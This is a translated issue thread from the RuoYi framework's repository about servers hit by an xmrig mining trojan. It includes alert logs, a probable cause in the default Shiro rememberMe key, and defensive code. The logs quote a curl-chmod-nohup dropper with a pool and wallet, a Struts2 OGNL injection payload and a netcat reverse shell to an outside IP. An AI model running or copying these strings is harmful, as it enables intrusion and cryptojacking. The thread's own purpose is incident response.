
若依 / RuoYi


A trojan appeared on a cloud server while the program was running

Done
Opened this issue 2021-02-18 15:51

This alert was detected by the following engine:
Command line: cmd.exe /c "pidof /tmp/watchdog || bash -c 'curl ** ** https://whatsmyipv4.cf/xmrig*** * -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &'"
Process PID: 6936
Process file name: cmd.exe
Parent process ID: 11932
Parent process: java.exe
Parent process file path: C:/Program Files/Javak1.8.0_91/bin/java.exe
Process chain:
-[7212] C:\Windows\Explorer.EXE
-[10648] "cmd.exe" /s /k pushd "D:\AprpDir123\miiccd"
-[11932] java -jar 123.jar

Event description: Cloud Security Center detected that your host is executing malicious script code (including but not limited to bash, PowerShell and Python); please investigate the intrusion source immediately. If this is your own operations activity, choose Ignore.

Note
This alert was detected by the following engine:
Command line: cmd.exe /c "pidof /tmp/watchdog || bash -c 'curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &'"
Process ID: 6936
Parent process command line: java -jar 123.jar
Parent process file path: C:/Program Files/Javak1.8.0_91/bin/java.exe
Parent process ID: 11932
Event description: The detection model found that a process command line executed on your server is highly suspicious and very likely related to trojans, viruses or hacker activity.
Process chain:
-[7212] C:\Windows\Explorer.EXE
-[10648] "cmd.exe" /s /k pushd "D:\AppDir\miic"
-[11932] java -jar 123.jar

Comments (29)

二聪 created task
二聪 set related repository to 若依/RuoYi

Command line: curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog
Process PID: 7827
Process file name: curl
Parent process ID: 7826
Parent process file path: /usr/bin/bash
Process chain:
-[2337] java -Xms2048m -Xmx2048m -XX:PermSize=2048m -XX:MaxPermSize=2048m -XX:MaxNewSize=1024m -jar ruoyi-admin.jar
-[7823] /bin/sh -c pidof /tmp/watchdog || bash -c 'curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &'
-[7825] bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &
-[7826] bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &
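The process chains in the alerts above, the Linux one here and the Windows one in the issue description, follow one pattern: a JVM spawns a shell, the shell downloads a binary into /tmp, marks it executable and backgrounds it with xmrig-style arguments behind a `pidof ... ||` guard. The Python below is an added example (not part of this issue or of RuoYi) that turns that pattern into a scoring rule over a process chain in the `-[pid] command` format the cloud alerts use. The indicator names, weights and verdict thresholds are my own choices; the Linux sample chain is copied from this comment, the Windows one is assembled from the issue description's chain plus the flagged command line (PID 6936), and the third chain is constructed to show that a JVM running a harmless command is rated only suspicious.

```python
"""Score a process chain for the JVM -> shell -> miner-dropper pattern.
Added example; not code from the issue or from RuoYi."""
import re

CHAIN_LINE = re.compile(r"^-\[(?P<pid>\d+)\]\s+(?P<cmd>.*)$")

# A JVM command line (java / java.exe) and a shell invoked with -c or /c.
JVM = re.compile(r'(?:^|[\\/\s"])java(?:\.exe)?(?:\s|"|$)')
SHELL = re.compile(r'(?:^|[\\/\s"])(?:sh|bash|cmd\.exe)"?\s+(?:-c|/c)\b')

# Per-command-line indicators: name -> regex.  Weights are assumptions.
INDICATORS = {
    # download into /tmp, then chmod +x the result
    "drop_to_tmp_and_exec": re.compile(r"\b(?:curl|wget)\b.*\s-o\s+/tmp/\S+.*chmod\s+\+x"),
    # "only run if not already running" guard used for persistence
    "guard_pidof": re.compile(r"\bpidof\s+\S+\s*\|\|"),
    # detach from the spawning shell
    "background_nohup": re.compile(r"\bnohup\b.*&\s*['\"]*$"),
    # xmrig command-line switches
    "xmrig_flags": re.compile(r"--donate-level\b|\s-k\s+--tls\b"),
    # pool host:port handed to -o
    "monero_pool": re.compile(r"\s-o\s+\S*(?:xmr|monero|minexmr)\S*:\d+"),
    # -u <95-char Monero address starting with 4>; alnum is a superset of base58
    "monero_wallet": re.compile(r"\s-u\s+4[0-9A-Za-z]{94}\b"),
}
WEIGHTS = {"shell_spawned_by_jvm": 3, "drop_to_tmp_and_exec": 3, "guard_pidof": 1,
           "background_nohup": 1, "xmrig_flags": 2, "monero_pool": 2, "monero_wallet": 2}


def parse_chain(text):
    """Parse '-[pid] command' lines (root first) into (pid, command) pairs."""
    pairs = []
    for line in text.strip().splitlines():
        m = CHAIN_LINE.match(line.strip())
        if m:
            pairs.append((int(m["pid"]), m["cmd"]))
    return pairs


def score_chain(text):
    """Return {'score', 'indicators', 'verdict'} for one process chain."""
    chain = parse_chain(text)
    hits = set()
    # chain-context indicator: a web-app JVM should not be spawning shells at all
    for (_, parent), (_, child) in zip(chain, chain[1:]):
        if JVM.search(parent) and SHELL.search(child):
            hits.add("shell_spawned_by_jvm")
    for _, cmd in chain:
        for name, rx in INDICATORS.items():
            if rx.search(cmd):
                hits.add(name)
    score = sum(WEIGHTS[h] for h in hits)
    verdict = "malicious" if score >= 6 else "suspicious" if score >= 3 else "benign"
    return {"score": score, "indicators": sorted(hits), "verdict": verdict}


# Copied from the Linux alert in this comment.
LINUX_CHAIN = """
-[2337] java -Xms2048m -Xmx2048m -XX:PermSize=2048m -XX:MaxPermSize=2048m -XX:MaxNewSize=1024m -jar ruoyi-admin.jar
-[7823] /bin/sh -c pidof /tmp/watchdog || bash -c 'curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &'
-[7825] bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &
"""

# Assembled from the Windows alert in the issue description (chain + PID 6936 command line).
WINDOWS_CHAIN = r"""
-[7212] C:\Windows\Explorer.EXE
-[10648] "cmd.exe" /s /k pushd "D:\AppDir\miic"
-[11932] java -jar 123.jar
-[6936] cmd.exe /c "pidof /tmp/watchdog || bash -c 'curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &'"
"""

# Constructed: the JVM runs a harmless command (as RuoYi's system-info page might).
BENIGN_CHAIN = """
-[2337] java -jar ruoyi-admin.jar
-[9001] /bin/sh -c df -h
"""

if __name__ == "__main__":
    for name, chain in (("linux", LINUX_CHAIN), ("windows", WINDOWS_CHAIN), ("benign", BENIGN_CHAIN)):
        print(name, score_chain(chain))
```

The JVM-spawns-shell indicator alone lands a chain in "suspicious" rather than "benign"; that is deliberate, since in a deployment like this one a shell child of the application JVM is exactly what an EDR rule should surface even before the payload is known.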

The mining trojan was also implanted on 1.23:
#I2F83H: Alibaba Cloud alert vulnerability, has anyone run into this?
This afternoon the same trojan was implanted again. I suspect there is a vulnerability in this project; please don't close this issue until it is resolved.


Suspicious attack entries currently visible in the logs:

13:20:17.032 [http-nio-8086-exec-23] ERROR o.a.c.c.C.[.[.[.[dispatcherServlet] - [log,175] - Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Filtered request failed.] with root cause
org.apache.tomcat.util.http.fileupload.InvalidFileNameException: Invalid file name: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo 88abe7aec077a15790f980021370c769').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\0b
	at org.apache.tomcat.util.http.fileupload.util.Streams.checkFileName(Streams.java:188)
	at org.apache.tomcat.util.http.fileupload.impl.FileItemStreamImpl.getName(FileItemStreamImpl.java:157)
	at org.apache.tomcat.util.http.fileupload.FileUploadBase.parseRequest(FileUploadBase.java:286)
	at org.apache.catalina.connector.Request.parseParts(Request.java:2895)
	at org.apache.catalina.connector.Request.parseParameters(Request.java:3228)
	at org.apache.catalina.connector.Request.getParameter(Request.java:1127)
	at org.apache.catalina.connector.RequestFacade.getParameter(RequestFacade.java:381)
	at javax.servlet.ServletRequestWrapper.getParameter(ServletRequestWrapper.java:158)
	at org.apache.shiro.web.session.mgt.DefaultWebSessionManager.getReferencedSessionId(DefaultWebSessionManager.java:136)
	at org.apache.shiro.web.session.mgt.DefaultWebSessionManager.getSessionId(DefaultWebSessionManager.java:279)
	at org.apache.shiro.web.session.mgt.DefaultWebSessionManager.getSessionId(DefaultWebSessionManager.java:273)
	at org.apache.shiro.session.mgt.DefaultSessionManager.retrieveSession(DefaultSessionManager.java:216)
	at org.apache.shiro.session.mgt.AbstractValidatingSessionManager.doGetSession(AbstractValidatingSessionManager.java:118)
	at org.apache.shiro.session.mgt.AbstractNativeSessionManager.lookupSession(AbstractNativeSessionManager.java:148)
	at org.apache.shiro.session.mgt.AbstractNativeSessionManager.getSession(AbstractNativeSessionManager.java:140)
	at org.apache.shiro.mgt.SessionsSecurityManager.getSession(SessionsSecurityManager.java:156)
	at org.apache.shiro.mgt.DefaultSecurityManager.resolveContextSession(DefaultSecurityManager.java:461)
	at org.apache.shiro.mgt.DefaultSecurityManager.resolveSession(DefaultSecurityManager.java:447)
	at org.apache.shiro.mgt.DefaultSecurityManager.createSubject(DefaultSecurityManager.java:343)
	at org.apache.shiro.subject.Subject$Builder.buildSubject(Subject.java:845)
	at org.apache.shiro.web.subject.WebSubject$Builder.buildWebSubject(WebSubject.java:148)
	at org.apache.shiro.web.servlet.AbstractShiroFilter.createSubject(AbstractShiroFilter.java:292)
	at org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:359)
	at org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.alibaba.druid.support.http.WebStatFilter.doFilter(WebStatFilter.java:124)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:202)
	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)
	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:542)
	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:143)
	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)
	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343)
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:374)
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:888)
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1597)
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
	at java.lang.Thread.run(Thread.java:748)
java.lang.IllegalArgumentException: Invalid character found in the request target [/incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/p;nc%20-w%205%2089.248.170.31%209772%200%3C/tmp/p|/bin/sh%3E/tmp/p%202%3E/tmp/p;rm%20/tmp/p%22%20--%3e]. The valid characters are defined in RFC 7230 and RFC 3986
	at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:486)
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:261)
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:868)
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1590)
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
	at java.lang.Thread.run(Thread.java:748)

@红亮 @haiya_oschina @二聪
There is no way to avoid being attacked; you can only harden. And none of the information you have posted looks like a framework problem.
1. The command above clearly shows the machine was trojaned. It's the first time I've seen it on Windows; you can look up related material.
2. The exception you posted shows the request was already blocked. If the command had been executed there would be no exception; since it threw, where is the vulnerability? If you don't want the exception displayed, catch it globally and return a custom message.
As for mining trojans, they usually come in through redis/mysql/pgsql: a weak-password login, then a process is planted. Very rarely do they come through a login to the system, unless your system has an interface that can be accessed without logging in. Here is a method for removing the trojan: 记一次服务器linux(centos7)被postgres病毒攻击的事故 (a write-up of a Linux/CentOS 7 server hit by the postgres virus); I've used it and it works. Also, apart from the application ports, don't expose any other port. A typical configuration:
1. Only open 80, 8443/443 and the remote login port (don't use the default, e.g. 22 or 3389; port forwarding or SSH forwarding is also an option)
2. Disable ping
3. Use a 64-character random value as the server login password and rotate it regularly
4. Set a login-failure delay policy (basically ineffective against brute force, can be skipped)
5. Restrict remote access to specified IPs

Also, check your servers' login logs; most of it is brute-force attacks.

Other similar write-ups, for reference:
【应急类漏洞】Linux下变种DDG挖矿病毒紧急通告及处置方法 (emergency advisory and remediation for the DDG mining virus variant on Linux)
watchdogs挖矿木马综合分析报告 (comprehensive analysis report on the watchdogs mining trojan)

@Ricky
1. So far there is no sign that the server was trojaned through a direct system login; logging in requires both SSH and a company IP, so that case is ruled out.
2. I know the log above was blocked; that means there was also an implant that was not blocked and left no log record.
3. From the parent process it is clear the arbitrary command execution vulnerability was introduced through the ruoyi process. Whether it is a third-party framework pulled in by ruoyi or ruoyi itself, I can't pin down at the moment.
4. Server ports are strictly firewall-controlled; I'm not considering that as the cause for now.
5. The current temporary solution is to use Java's security mechanism (SecurityManager) to forbid external command execution outright (not a root-cause fix!).

This framework has now been trojaned on multiple systems, by multiple people, multiple times, and it is arbitrary command execution, serious enough to delete anything on the server and read any data. Please take it seriously. The final goal is to find the vulnerability and fix it, not to keep pushing it off onto third parties outside the framework; even if a third party caused it, it happened here.

It has happened twice already; if it happens once more I'll probably be fired. Looks like I need a plan B and should see whether we can migrate to another framework :sob:

Just checked another server that also uses the ruoyi framework; it has the same mining trojan. How is anyone supposed to work with this...

The trojan came in through the cookie.
Did you set the RuoYi back-end username and password?

@红亮 You could try stopping the application on this server, deleting the related project, and deploying it as a WAR on another server for a while; that way you can determine whether it is a server problem or a project problem.

若依 changed description

Judging from the logs, a malicious script is being uploaded. Apart from a few public URLs, everything else in the system is blocked; you must be logged in to access it.

So you can check along these lines. First, the upload path is profile; check whether a malicious script has been uploaded under that path. Uploading there also requires login. (If it is a system problem, I think this is where it could be; the generic upload also has some restrictions, and anything not meeting the rules throws an exception.)

ruoyi:
  # file path, e.g. Windows: D:/ruoyi/uploadPath, Linux: /home/ruoyi/uploadPath
  profile: D:/ruoyi/uploadPath

If there is nothing there, it is most likely caused by another plugin or service; check the other services yourself. Tomcat can be upgraded, or swapped for another container such as jetty/undertow, and then observed.

I've been hit by this kind of trojan before too; it was always redis/mysql and the like. But other causes can't be ruled out. If there is later feedback that a framework vulnerability is involved, a notice will be issued. Or, if you have more detailed information, keep posting it here for analysis.

If you have an externally exposed upload interface, it is recommended to encrypt the parameters and verify a signature before the file is written; a script can only run once it has landed.

Ricky set top level to High
若依 changed top level from High to Not top
若依 changed issue state from To do to Done

@Ricky @若依 I haven't followed this issue for a while. Reading your replies, I don't think you looked carefully at the attack path above. This is not file upload at all; somewhere a JVM shell command is being executed dynamically, and from the path Alibaba Cloud gave above it is clearly the java.exe belonging to ruoyi that executed it. Only after I disabled all JVM shell command invocation did the trojan stop coming back.

I think the direction is that some place in this back end can execute JVM shell commands, e.g. the part that fetches system information seems to execute something. How exactly it is attacked I don't know either; I can only plug the hole at the point where it finally takes effect.

How was it solved? It happened here again two days ago.

This vulnerability should be a JVM execution hole somewhere in the system; it is not at all what the author says about weak passwords or an unreplaced private key.

If you can't find where the vulnerability is, fixing this is still simple: just forbid JVM shell commands outright.

See the consolidated reply at the bottom for the implementation.

My solution has been posted at the end of this issue; see whether it helps you. Since I added it, the mining command has never been executed here again.

Command execution vulnerability: RuoYi <= v4.3.0
RuoYi uses Apache Shiro. Shiro provides a Remember Me feature so that the next visit does not require logging in again. The system hard-codes the key in the source, and the official documentation did not stress changing it, so most users of the framework run with the default key. An attacker can craft a malicious object, serialize it, AES-encrypt it, base64-encode it and send it as the rememberMe field of the cookie. Shiro decrypts and deserializes the rememberMe value, which results in a deserialization vulnerability and arbitrary command execution on the target machine.

Check: does ShiroConfig.java contain fCq+/xW488hMTCD+cmJ3aQ==? If the default key is in use it must be changed to prevent command execution attacks.

Fix: upgrade to >= v4.3.1 and generate a new key to replace cipherKey; make sure it is unique and not leaked.
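A practical way to carry out the check above. The Python below is an added example, not RuoYi's or Shiro's code: it scans a Java source or config fragment for base64 literals of AES key length, flags the RuoYi default named above (and, from general knowledge rather than from this issue, Apache Shiro's own 1.2.4 built-in default kPH+bIxk5D2deZiIxcaaaA==), rejects literals that do not decode to an AES key, and generates a replacement in the form that `setCipherKey(Base64.decode("..."))` expects. The ShiroConfig fragment it runs on is constructed in the shape of the real one, not copied from the project.

```python
"""Audit a Shiro rememberMe cipherKey and generate a replacement.
Added example; not code from RuoYi or Apache Shiro."""
import base64
import re
import secrets

# Keys known to ship as defaults.  The RuoYi one is the value this issue names;
# the Shiro 1.2.4 one is added from general knowledge, not from this issue.
KNOWN_DEFAULT_KEYS = {
    "fCq+/xW488hMTCD+cmJ3aQ==": "RuoYi <= v4.3.0 ShiroConfig default",
    "kPH+bIxk5D2deZiIxcaaaA==": "Apache Shiro 1.2.4 built-in default",
}

# Quoted base64 literal the length of a 16-byte (22 chars + '==') or
# 32-byte (43 chars + '=') key, which is what Shiro's cipherKey holds.
_B64_KEY = re.compile(r'"([A-Za-z0-9+/]{22}==|[A-Za-z0-9+/]{43}=)"')


def find_cipher_keys(source: str) -> list[str]:
    """Every quoted base64 literal in the source that could be a cipherKey."""
    return _B64_KEY.findall(source)


def audit(source: str) -> list[dict]:
    """Flag known-default or malformed keys.  Each finding is {'key', 'reason'}."""
    findings = []
    for key in find_cipher_keys(source):
        if key in KNOWN_DEFAULT_KEYS:
            findings.append({"key": key, "reason": "known default: " + KNOWN_DEFAULT_KEYS[key]})
            continue
        try:
            raw = base64.b64decode(key, validate=True)
        except ValueError:  # binascii.Error is a ValueError
            findings.append({"key": key, "reason": "not valid base64"})
            continue
        if len(raw) not in (16, 24, 32):
            findings.append({"key": key, "reason": f"{len(raw)} bytes is not an AES key length"})
    return findings


def generate_cipher_key(nbytes: int = 16) -> str:
    """Fresh random AES key, base64-encoded for setCipherKey(Base64.decode(...))."""
    if nbytes not in (16, 24, 32):
        raise ValueError("AES key must be 16, 24 or 32 bytes")
    return base64.b64encode(secrets.token_bytes(nbytes)).decode("ascii")


# Constructed fragment in the shape of RuoYi's ShiroConfig (not copied from the project).
SAMPLE_SHIRO_CONFIG = '''
    public CookieRememberMeManager rememberMeManager() {
        CookieRememberMeManager cookieRememberMeManager = new CookieRememberMeManager();
        cookieRememberMeManager.setCipherKey(Base64.decode("fCq+/xW488hMTCD+cmJ3aQ=="));
        return cookieRememberMeManager;
    }
'''

if __name__ == "__main__":
    for f in audit(SAMPLE_SHIRO_CONFIG):
        print("FINDING:", f["key"], "->", f["reason"])
    print("replacement cipherKey:", generate_cipher_key())
```

Run it over every deployed build, not just the repository: the key lives in compiled ShiroConfig.class too, and a rotated key invalidates every existing rememberMe cookie, which is exactly the intent.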

Alibaba Cloud version
uname -a
Linux api.xxx.com 3.10.0-957.21.2.el7.x86_64 Wed Jun 5 14:26:44 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

RuoYi version v4.6.0

bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &
Hit this problem too

Roughly two scenarios.
1. The Shiro key was not changed. Every version needs a freshly generated key, or remove the Remember Me feature.
2. A port is exposed externally with a weak password and was brute-forced.

Can you provide the error logs from that time period?

@若依 I wasn't going to respond to this issue any more, but someone above asked me for the fix code, so here is my solution. I think the author should reopen this issue so that more people who were attacked can see it:

Add the code below to the project to forbid JVM command execution. Once it is forbidden, the "view system information" feature in the back end will stop working.

package com.ruoyi.common.config.security;

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.stereotype.Component;
import sun.reflect.Reflection;

import javax.annotation.PostConstruct;
import java.security.Permission;

/**
 * @author hongliang
 * Forbid Java from executing external (cmd/shell) commands, so that a
 * command execution bug cannot be used to plant a trojan.
 *
 * Note: SecurityManager is deprecated for removal since Java 17 (JEP 411), and
 * from Java 18 System.setSecurityManager throws UnsupportedOperationException
 * unless the JVM is started with -Djava.security.manager=allow.
 * sun.reflect.Reflection is JDK-internal and is not accessible on Java 9+
 * without --add-exports; this class targets the Java 8 used in this issue.
 */
@Component
public class JvmExecForbid {
    protected final Logger logger = LoggerFactory.getLogger(JvmExecForbid.class);

    @PostConstruct
    public void init() {
        logger.info("start JvmExecForbid!!!!");
        forbidJvmCmd();
    }

    /**
     * Forbid Java from executing external commands (Runtime.exec / ProcessBuilder.start)
     * so that malicious commands cannot be run.
     * https://www.anquanke.com/post/id/151398
     */
    public static void forbidJvmCmd() {

        // Custom SecurityManager
        SecurityManager sm = new SecurityManager() {
            private void check(Permission perm) {
                // Runtime.exec / ProcessBuilder.start go through SecurityManager.checkExec,
                // which asks for a FilePermission with the "execute" action: deny it
                if (perm instanceof java.io.FilePermission) {
                    String actions = perm.getActions();
                    if (actions != null && actions.contains("execute")) {
                        throw new SecurityException("execute denied! It could be a Trojan horse attack ");
                    }
                }
                // Deny replacing this SecurityManager, so it cannot simply be removed
                if (perm instanceof java.lang.RuntimePermission) {
                    String name = perm.getName();
                    if (name != null && name.contains("setSecurityManager")) {
                        throw new SecurityException("System.setSecurityManager denied!");
                    }
                }
                // Everything else is allowed; no other policy is applied
            }

            @Override
            public void checkPermission(Permission perm) {
                check(perm);
            }

            @Override
            public void checkPermission(Permission perm, Object context) {
                check(perm);
            }
        };
        System.setSecurityManager(sm);
        // Hide ProcessImpl.start from reflection so the check cannot be
        // bypassed by calling it reflectively
        try {
            Class<?> clz = Class.forName("java.lang.ProcessImpl");
            Reflection.registerMethodsToFilter(clz, "start");
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        }
    }
}

Hi Hongliang. At startup this code gets stuck in a recursive call: the `perm instanceof java.io.FilePermission` logic and the checkPermission(Permission perm) method keep calling each other. Could you help explain when you have time? Thanks :smiley:

Our Alibaba Cloud server has this problem too; I hope the author takes it seriously.
-[32059] java -jar -Xms256m -Xmx1024m -XX:MetaspaceSize=128m -XX:MaxMetaspaceSize=512m ruoyi.jar
-[28294] /bin/sh -c pidof /tmp/watchdog || bash -c 'curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &'
-[28297] bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &
-[28298] bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &

Check whether your login page still has the default password.
The trojan logged in to your RuoYi system and was sent through a request.
This was the IP at the time ------ 89.248.165.10

Likewise, I ran into the same problem: twice within one month I found the CPU maxed out by a process called watchdog.

uname -a

Linux ebs-5811 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

RuoYi v4.6.0

ps -ef |grep watchdog

root 12 2 0 Jun26 ? 00:00:00 [watchdog/0]
root 15 2 0 Jun26 ? 00:00:00 [watchdog/1]
root 37 2 0 Jun26 ? 00:00:00 [watchdogd]
root 2893 1 0 Jun26 ? 00:00:00 bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &
root 2897 2893 99 Jun26 ? 7-03:59:59 /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls
root 291837 290001 0 14:48 pts/0 00:00:00 grep --color=auto watchdog

